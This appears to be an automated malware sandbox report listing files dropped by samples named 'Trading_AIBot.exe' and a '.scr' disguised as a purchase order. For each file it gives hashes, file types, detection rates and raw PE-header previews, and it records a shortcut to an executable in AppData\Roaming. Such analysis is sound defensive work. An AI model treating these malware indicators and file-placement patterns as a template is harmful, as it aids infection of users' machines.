SHA-512:5DF53F5D1E3FCEDBB71DB8AD56EAFEC1F87661CB33043543AAF05574ABC8E837793BA1B528FAFEE1C9189BD04BC3D0D75371673D78D78F9DFD6F3943A18D3559
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):665670656
Entropy (8bit):7.999999365004637
Encrypted:true
SSDEEP:
MD5:46981F20592CA1EB36C2C21E396551EC
SHA1:B69BC78919358BF2B5AEF2BF4CB20E13147B6291
SHA-256:A4A9235B90C29FA3A4A5E48E1CBCDF176408FB91D03F38FD67FA51FD820978C6
SHA-512:10B0551E36C2D48299861B376329B54B3D45948A28F83BD43EF85E87563FE83E583D5614727936CC082417AF9BB0F2584FB425762507221197FF90D9DC4AE4D4
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Wed Jan 15 10:57:10 2025, mtime=Wed Jan 15 10:57:10 2025, atime=Wed Jan 15 10:57:10 2025, length=70656, window=
Category:dropped
Size (bytes):1789
Entropy (8bit):3.4362169800747995
Encrypted:false
SSDEEP:24:8jzW8Ecp2wzn/IG9BqR+O4ZvPqRVO1Mqj7U:8nW8110R+ZXqRynU
MD5:BAF8BE60BC8DF22D90BB7D8062DF2EA0
SHA1:A262A089B977AA89D634A2E51064E9705DC9D47A
SHA-256:876E68FAD523347100CDFF4DCCEDBA6D31A96B4A40530E157879000A0E6767AD
SHA-512:B8859AF2D8E7E3593806B1EE92C1816B0AE752815A1BA1D6F0560A8208099023A8227C1F9FFF9517CFD49DB1DBCB1CD9FFA2D7160B7275884AD34484D004F75F
Malicious:false
Preview:L..................F.@.. .....Dg.....Dg.....Dg...............................DG..Yr?.D..U..k0.~.t...CFSF..1.....QK.X. AppData...t.Y^...H.g.3..(.....gVA.G..k...<......QK.XQK.X*....=....,...............A.p.p.D.a.t.a...B.R.1...../Z%_. Roaming.<......QK.X/Z%_*....=....6...............R.o.a.m.i.n.g.....P.1...../Z&_. ACCApi..:....../Z%_/Z&_*.........................A.C.C.A.p.i.....^.2...../Z&_ apihost.exe.D....../Z&_/Z&_*.........................a.p.i.h.o.s.t...e.x.e.......................-...8...[............:Wh.....C:\Users\..#...................\\618321\Users.user\AppData\Roaming\ACCApi\apihost.exe...A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.3.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.a.d.i.n.g._.A.I.B.o.t...e.x.e.........%USERPROFILE%\AppData\Local\Temp\Trading_AIBot.exe
Process:C:\Users\user\Desktop\PO#_1100015533.scr
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):1538560
Entropy (8bit):7.867365277392532
Encrypted:false
SSDEEP:24576:rbJN+UVsa/olfwDPFB1Oj4eg9CQA1S092Txy0QEII2vWmexiq4VzGQ1IZTlNdSwq:X3+UfWwDPfkGCRUTs0QEI6TxiqCGKoF0
MD5:AC9D898648D7B851BBCCB6F6028D45C6
SHA1:82379E0B59F9A08C7196897A09BE3AE859EC498A
SHA-256:6F9D6AB9FCCD1087337ED8328407E5918BD3E2CDDEF4E4C4B56B067E956AC0D2
SHA-512:FC705A48E8FA764160CD021F25E0DDE73FCBBEEBF0CFFFBE572317C163CD0946A39A4D6C075D39E5DCBEDBF86C74BED978534004C3B4A1B66E311752AA102BBD
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 21%
Process:C:\Users\user\Desktop\PO#_1100015533.scr
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Preview:[ZoneTransfer]....ZoneId=0
Process:C:\Windows\System32\msdtc.exe
File Type:CSV text
Category:dropped
Size (bytes):393
Entropy (8bit):5.068361882908193
Encrypted:false
SSDEEP:12:tFysXwBRVmWnG3FysXwDUmWnWD3FysXwP5/W8I:tFy4wVmWnG3Fy4womWny3Fy4wh//I
MD5:6BDE1F7A58EDDDE27AFC3768DB61D82E
                                                                                                                                                                                                                                                                        SHA1:F1CD84CFC24F75C85AE056AE0907B92F8B5CA82C
                                                                                                                                                                                                                                                                        SHA-256:2A0943B18110F4344A2C4312EEC4712E47E2A02987F672CC704980E44811B8D2
                                                                                                                                                                                                                                                                        SHA-512:E6AA0B1C51FFF01B56954076AC6EC8EFEB0F9DB6C60E7F93223D824C790D80EDD31707AF0C184F4C500F7BF25BD32E3C6F053D1AAB85C383AE784A7320A735D6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:01-15-2025 06:57 : DTC Install error = 0, going to do CreateMutexW, d:\w7rtm\com\complus\dtc\shared\util\security.cpp (1101) ..01-15-2025 06:57 : DTC Install error = 0, successfully done CreateMutexW, d:\w7rtm\com\complus\dtc\shared\util\security.cpp (1141) ..01-15-2025 06:57 : DTC Install error = 0, IN CILogWriteAsynch::Init, d:\w7rtm\com\complus\dtc\dtc\log\logmgr\src\ilgwrta.cpp (173) ..
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1212416
                                                                                                                                                                                                                                                                        Entropy (8bit):5.144440264190482
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:HJz2DWUyXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:pz2DWXsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:3D8ACDF76F489584D14AAD10E91C4B81
                                                                                                                                                                                                                                                                        SHA1:DA25EEF59F5F994EDE2F89B63A4F79DD9FF7CE2C
                                                                                                                                                                                                                                                                        SHA-256:3586E051248F7CE1F755C39B5D0289A55701015B1A9A7FACFBCE3A11BC719CE3
                                                                                                                                                                                                                                                                        SHA-512:443FF82732205F0AAA17E835D4964FF4A2E6CEE6099DCA39E79E672EC6DA16A3E61102F3B7FF08D4ABD6DBB1841CBC0ABE1793E285E5C43E0AF8E98363716967
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........6..e..e..e.s.e..e.(.e..e.s.e..eI+.e..en*.e..eI+.e..eI+.e..eI+.e..e..e9.e.(.e..e.(.e..e.(.e..e.(.e..eRich..e........................PE..d...8..S..........#......"..."......@x.......................................................................................................!..........<....`..X.......................................................................p............................text...$ .......".................. ..`.data...p....@.......&..............@....pdata..X....`.......*..............@..@.rsrc....P.......@...@..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1168896
                                                                                                                                                                                                                                                                        Entropy (8bit):5.073885902574867
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:uQVuwSXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:uQtSsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:E77E152A4018445F2DBB4277C818FAEC
                                                                                                                                                                                                                                                                        SHA1:9676C6C89ACD9B8E04876562180375DBC9E9BF99
                                                                                                                                                                                                                                                                        SHA-256:F8108B687F25905A962E82B6F2F162CE1BE7B9651A3A7717ACAB501F902F72A0
                                                                                                                                                                                                                                                                        SHA-512:E48D2E83198DEA1E5DCD48A436416CA54AC707BC73D39377C53ED24FE695643A183599A74BD9D76F3628DE76E71D63B8459ABD0E11E13082187E4A55046A82F6
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x.m_<...<...<.......8.......>.......(.......0.......>..."..>.......=...<...........1.......-.......=.......=.......=...Rich<...........................PE..d...Wn.\.........."......\...8......0].........@.............................0......kQ.... .......... ..................................H...............|............................|..T...........................`|...............p...............................text....Z.......\.................. ..`.rdata...#...p...$...`..............@..@.data...x...........................@....pdata..............................@..@.rsrc...|...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1271808
                                                                                                                                                                                                                                                                        Entropy (8bit):5.149076303523621
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:lmEp99oXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:tDosqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:42280A7385A4A80C419F1AB1581CB6BF
                                                                                                                                                                                                                                                                        SHA1:E13A0CAEF87F572243206792C87BB499DB341285
                                                                                                                                                                                                                                                                        SHA-256:DA36B82B72D6CEAEEBE7C156D87EA57F7A686226B2AB57C03A88FC3913AD094D
                                                                                                                                                                                                                                                                        SHA-512:F6761FDFF60E8B7B6FB0AA64BBF70872EB6E398297A935995C32F8DFF0FBFCF8F6A87E951948D3B5530641818CC35607171CBE16FB9869BE4DC33A9F2C22C7CD
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P..1.1.1.`FM..1.XP...1.cb..1..Q...1..Q.1..Q.1..Q...1.1..}1.`FH..1.XP...1.XP...1.XP.1.Rich.1.........PE..d....k.\.........."..........2.................@.....................................T.... .................................................<........P..l....@..h.......................T........................... ................................................text............................... ..`.rdata..............................@..@.data........ ......................@....pdata..h....@......................@..@.rsrc...l....P....... ..............@..@.reloc...P...`...@...(..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1188864
                                                                                                                                                                                                                                                                        Entropy (8bit):5.134607825048474
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:7RbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:lbsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:2B985C6626E556766B85A585B9413EE2
                                                                                                                                                                                                                                                                        SHA1:5EB1609A0AA4F9CEDD410F2B373555AC3E021D2D
                                                                                                                                                                                                                                                                        SHA-256:6022F566F604173DD13052B1A98A018BED3A205E0CB0AF23A8F870DF6AE8BD13
                                                                                                                                                                                                                                                                        SHA-512:D5D1D47AB2F4541AB8F37177863F9AA9CBC256083729A374A987FFF9AD0A0F19F8AB0FF177C8AFFFB2231AC8CFF660BEED98746C668F0A015FDD4C497C976340
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................e~.....B......e~.....e~.....e~............}......}......}.......}......}.....Rich...........................PE..L...C..S.....................................................................P.................. ..........................d...........<...........................................................(:..@............................................text...B........................... ..`.data...............................@....rsrc....P.......@..................@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1244672
                                                                                                                                                                                                                                                                        Entropy (8bit):5.184753131743034
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:f+u3TUppjXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:fTTUppjsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:94289130034BEC08E7DC23DD5DBDD4FB
                                                                                                                                                                                                                                                                        SHA1:6982DFF6EF94C31AE8DE75B1146FD960833A6AD6
                                                                                                                                                                                                                                                                        SHA-256:885EFB574B2673741C636743893344C46A532AA688923A59A763DEF8F3AEB617
                                                                                                                                                                                                                                                                        SHA-512:C483C7DF3A21A08B43C26FEE89782D835F53CAD0AA297F7BD2F9E511B5D9C0927B9D08E4C3FD540404A4B07615574FAF0BE92D21177266076DE45E485D488A11
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~KM..%...%...%.;h....%..~!...%..M....%.T.$...%.T.&...%.T. ...%.T.!...%...$.'.%.;h....%..~,...%..~....%..~'...%.Rich..%.................PE..L...ln.\.........."..........6.......R............@..........................0......].......................................`...........l...........................p...T..............................@...............\............................text............................... ..`.data...p...........................@....idata..............................@..@.rsrc...l...........................@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\PO#_1100015533.scr
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1393664
Entropy (8bit):5.416095657157234
Encrypted:false
SSDEEP:24576:WtzKePpWfsqjnhMgeiCl7G0nehbGZpbD:WtvPgDDmg27RnWGj
MD5:DEA04FF3825A6416CBCDC2FF21C43332
SHA1:C811EF7A420A6E461FBFAC8EB2E8910A6D49810C
SHA-256:9862E937609111159BCBB8AB6F2246027F69B2FB1C9B3E25DABAF49833132488
SHA-512:0B4A4AD7BECC87972A13B674A99D761728549A109C01664EEC7F639F7DBA74F8BB98D920FFA84D80E06B586AF0CA828034D652BC08B75B88969BA587B6482E36
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:data
Category:dropped
Size (bytes):12320
Entropy (8bit):7.984480176573596
Encrypted:false
SSDEEP:384:WEUH/OzQ/DKyWgqA+yw0OEb5IZBWlmLYlhgnW3HCPZz:W1WzQ/+yCASIb2glmUlhKgCZ
MD5:C2A75342C10932AA26F506050491DE3E
SHA1:A871E0B256EEF10684DF60E64D7991DFCCE7C121
SHA-256:ED506D7D5AE36844FA02A80D1282FD9C908644C69A07F332CF51AD599C9C70D3
SHA-512:9EFA19D0258A2A61ADE677D22A09A40E3B58AC38CD8497A6E958431FB91E7257F8405F8B39F44A876CD80454AD12DFED8977DB7C788C7DE2F31C1B0332EC06D7
Malicious:false
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1150464
Entropy (8bit):5.042604115032639
Encrypted:false
SSDEEP:12288:xXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:xsqjnhMgeiCl7G0nehbGZpbD
MD5:11D691ADAD67DBAC861DB2471CE9028B
SHA1:3D200E9E2B4B1D97E98005CDE19222D291D14D2C
SHA-256:BDB0B60449921F2D85F4FFBEBFCD18D654F3B60D84FE6EDBFC8C52353BE2B1C2
SHA-512:C9DD2C19370CA316C2456345542536BEAB446772B12CB3E7FBAA73B458CC2B0A248ED1B6DA22D96775C92443B678268BFC9829B6C8553B9CB336BACCEDC5DF23
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1269760
Entropy (8bit):7.275173371862657
Encrypted:false
SSDEEP:24576:olv3yIUPE1Bubmq3nT6j3xsqjnhMgeiCl7G0nehbGZpbD:olfyIUPE1BuB3uj1Dmg27RnWGj
MD5:5F010917F62C2D56F7B242050E3524D7
SHA1:E970CF52F85571FE1B307157B5AFCAAF3D162388
SHA-256:B0B1BC4A81B9A1A1DB20D066239EBC33DE63A8D33567D4490A9A206752AF5542
SHA-512:CFF70D81F01079F050B0CD84F914888F05553B66E0CFFFB037C560FD13E7798F55FFFCEC346E42D2ED68B313D39D5E1F3A6725AA1B0ACC5B45BE1005EDB4C07D
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1140224
Entropy (8bit):5.021997397935296
Encrypted:false
SSDEEP:12288:AXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:AsqjnhMgeiCl7G0nehbGZpbD
MD5:860030B06B83DAD907D4E0801AB228F9
SHA1:2E19913DAFBD66972D02A86A206ED4A3B8AF956B
SHA-256:210B59285CAB4C5C6A686529C7510A752D9DE5DC27C4792D57BFE1C2C38C28FD
SHA-512:7CF199F378DFD48F5E83241CA3F119D4216FD1EFEBFB070E555B988261799E9FA91C6DCF4EC0FDF9C23F1C314E4A0B5977DAAF1CB3726E3C866998032864F8D6
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Windows\System32\msdtc.exe
File Type:data
Category:dropped
Size (bytes):16384
Entropy (8bit):0.28874895406702894
Encrypted:false
SSDEEP:12:/OCwwtvU07qF69Fq5C1Ci6CzE5Z2+fqjF+:/nvj1V1CYiY+fC+
MD5:87F084D1898916B40A76012B21004344
SHA1:4CDD88DF7D3D8C1945F859A2E354706AA7053109
SHA-256:43027569DE24ABF804F16169A6C10D47C764B582A121EBA7B09AE1A6BB21D3B7
SHA-512:05529612F10578CA033AF43E71FAAEF55CAD0EC11E38B50053CD752DFEF282AF5FBB379D69EF9E348B80A85AC9EB2448AA6CB25B91E9ECE86828ADFD19FF1F30
Malicious:false
                                                                                                                                                                                                                                                                        Preview:.@......................................................................................................@......................aa..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................9.mr.... .....i...Dg..........M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:modified
Size (bytes):1173504
Entropy (8bit):7.174550319438343
Encrypted:false
SSDEEP:24576:T9Bcju8+g/Gb4uvsqjnhMgeiCl7G0nehbGZpbD:TQStg/Gb4IDmg27RnWGj
MD5:ECBEF93CBFE0A545B71C5ACFA746DA04
SHA1:D38E74B5DCEC8F406DBFF8B575E63431785D39E6
SHA-256:DBF672EB722F258F3C067D5FF26226E098248C3CC02E19EDF63C5B531BAEAD16
SHA-512:D3D374AB6C39264A64E05F0A9FB847E39113A063FE5FB6AD94B95A05023C0C67150CF255D09CCBC4CBAFE90790CE01FBA729A3AFED841A3BA21E7261FA63CA80
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g~.F...F...F...O~..D...O~..O...O~..]...F...1...O~..^...O~......O~..G...O~..G...RichF...........................PE..d......M.........."..............................................................................................................................................m......................8...................................................t........................text............................... ..`.rdata..............................@..@.data...$(.......&..................@....pdata...m.......n..................@..@.rsrc................h..............@..@.reloc..............................@......Mx...2..M....%..M....2..M.......M.......M....2..M....2..M....%..M....)..M....z..M....Y..M.......M.......M............ADVAPI32.dll.ntdll.DLL.KERNEL32.dll.USER32.dll.msvcrt.dll.ole32.dll.OLEAUT32.dll.TQUERY.DLL.SHLWAPI.dll.MSSRCH.DLL.IMM32.dll............
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2180096
Entropy (8bit):6.68959938174692
Encrypted:false
SSDEEP:49152:f4W+J/pHuR7n20mT4FE2LnhUxfpDmg27RnWGj:A/xBD527BWG
MD5:A1875BAA876312B1459A9716A68C85CD
SHA1:684EE9B52DF6AED35EC3DA9E9195B63855DA9ABE
SHA-256:EB9509911AEBA5AF68F9CF7333A93A43AD5878E458FE5C0781921E8B566E4B71
SHA-512:BFB8B5A7288963F3F335FAC03E13876246D7ADE9B5D376D951403EE73FC164F06B2452F52D07B3ADF5C5AA2D05982B360BDBC52D312FFD2735FBEE30E40694B3
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......69..rXj.rXj.rXj.{ ..pXj.{ ..[Xj.rXk..Yj.{ .nXj.{ ...Xj.{ .~Xj.{ ..sXj.{ ..sXj.RichrXj.........PE..d......L.........."......F...,................................................!......,".............. .......................................-.......@...N..............................................................................`............................text...PD.......F.................. ..`.data...(!...`.......L..............@....pdata...............b..............@..@.rsrc....N...@...P..................@..@.reloc...............T..............@...U..L.......L.......L.......L.......L....7..L.......L....h..L....,..L.......L$...0..L0...n..L=......L.......LH......LS......L`...i..Lk......Lv...q..L....3..L.......L.......L....\..L.......L.......L.......L............ADVAPI32.dll.ntdll.DLL.KERNEL32.dll.USER32.dll.msvcrt.dll.ATL.DLL.ole32.dll.SHLWAPI.dll.OLEAUT32
Process:C:\Users\user\Desktop\PO#_1100015533.scr
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:modified
Size (bytes):1208832
Entropy (8bit):5.143592469869781
Encrypted:false
SSDEEP:12288:GLWvXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:GLWvsqjnhMgeiCl7G0nehbGZpbD
MD5:194D43897AB889D24B26961F99059037
SHA1:729C6238CE9D8440036A33DDAB9FF7EB8E3044C8
SHA-256:A811040C351FE4EFB7556F1DAEE063B462DCDF18F6C424500F2EE2BFEB9939DA
SHA-512:07ED821429D0E6891E4F9804F9BD547D84CC9D2578F664C79BBD855B377F29F68317673815DA1E8798E7BE6A7041D1EA0DDC0EC5B2A52CB046382C22DC2DC2C3
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I..&.dxu.dxu.dxu...u.dxu...u.dxu...u.dxu.dyuudxu...u.dxu...u.dxu...u.dxu...u.dxuRich.dxu........................PE..d.....[J.........."..........D......................................................oC............... ......................................,........0....... ......................P................................................................................text............................... ..`.data...............................@....pdata....... ......................@..@.rsrc........0... ..................@..@.reloc...P...P...@...2..............@...k.[Jh.....[Ju...+.[J......[J....+.[J....p.[J......[J......[J......[J....+.[J......[J......[J............ADVAPI32.dll.KERNEL32.dll.NTDLL.DLL.msvcrt.dll.ATL.DLL.WS2_32.dll.ole32.dll.OLEAUT32.dll.WSOCK32.dll.MSWSOCK.DLL................................................................................
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1139712
Entropy (8bit):5.015874053373207
Encrypted:false
SSDEEP:12288:CXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:CsqjnhMgeiCl7G0nehbGZpbD
MD5:B179AD817685558FDF4973AE5B64DD19
SHA1:02791927C5452CE6DCB94C0A4E8C72A33A5B62CB
SHA-256:20CE616880E8AB0914F0656A08FDC4FD0F8988B030AD10A5452C7369A9754EBF
SHA-512:B6EBA12EC6C77D1446C026835BFCFCEB72B6E87AC0F6D798406476734AE5B750AAE3B3975F8415FC64D47F2DF0385F0BBB37AC393BA7A1703C6A1751F0A58C9B
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z...z...z.......z.....z.....z...{...z.......z.....z.....z.....z.Rich..z.................PE..d...T.[J..........".................L........................................................................................................!..d....P.......@......................p...8.......................................\.... ..8............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@......................@..@.rsrc........P....... ..............@..@.reloc...P...`...@...$..............@.....[J0.....[J=...+.[JH.....[JR...+.[JH...........KERNEL32.dll.msvcrt.dll.NTDLL.DLL.ole32.dll.............................................................................................................................................................................
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1244160
Entropy (8bit):5.190608529759698
Encrypted:false
SSDEEP:12288:tjRpNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:bpNsqjnhMgeiCl7G0nehbGZpbD
MD5:BF5F5556930D8CEF7BBAC46115910CF1
SHA1:E132A455EBDED39768AE1D5E928ED4823E3207B1
SHA-256:71C6AED1D7F7F1A49FEC96016F34AA5D155E0D2DD53C9821C7BB4A1EB8E3BC2C
SHA-512:129B0976642DF122AEC1323020D32FFC427A8CEE949CE5A59C1CF8465C7BADA8D6ADDB2F7241EDD0209A4844101EA2A7568038274CEC7D099893A3DB1F4A5DB6
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A.SK a.K a.K a....A a...." a....x a....@ a.K `.. a....G a....J a....J a.RichK a.........................PE..d....p.X.........."......p...n.................@.............................`......b..... .......... ......................................P...x...............\....................................................?..................H............................text...ho.......p.................. ..`.data....8...........t..............@....pdata..\...........................@..@.idata..............................@..@.rsrc...............................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1271296
Entropy (8bit):5.144820736066312
Encrypted:false
SSDEEP:12288:FkyeXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:OyesqjnhMgeiCl7G0nehbGZpbD
MD5:48149FCDFB3E1B695AD17C25A00F9901
SHA1:932952DE83AC926A464FA56EEF6CAE7EC1094D4E
SHA-256:3CAC62D1563A10BF1344125B62C90D63C3BA76AC20814664300963AFF0B95AEF
SHA-512:84BD73C952CA91BD88739D3DC5B77B91081A6507A14E43ADFDB9A0883FB3F684D9180658AEEAACBFC41193D5C06C531D910025B6AD01FF09DCF71468EF4820A4
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........bUUJ.;.J.;.J.;.C{..H.;.C{..[.;.J.:...;.C{..^.;.C{..].;.C{..I.;.C{..K.;.C{..K.;.RichJ.;.........PE..d...Z.[J.........."............................@....................................U................@.................................................px......D...................P................................................................................text...z........................... ..`.data...x(..........................@....pdata..D...........................@..@.rsrc...px.......z..................@..@.reloc...P...p...@...&..............@.....[JX...+.[Je.....[Jo.....[Jy...+.[Je.....[J....+.[Je.....[J......[J....k.[J............KERNEL32.dll.NTDLL.DLL.ole32.dll.msvcrt.dll.MSDTCTM.dll.VERSION.dll.USER32.dll.ADVAPI32.dll.....................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1256960
Entropy (8bit):5.194551495144131
Encrypted:false
SSDEEP:12288:981ONGp1EXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:KN1EsqjnhMgeiCl7G0nehbGZpbD
MD5:0B127B7A1AB570F72488585B52FA0F77
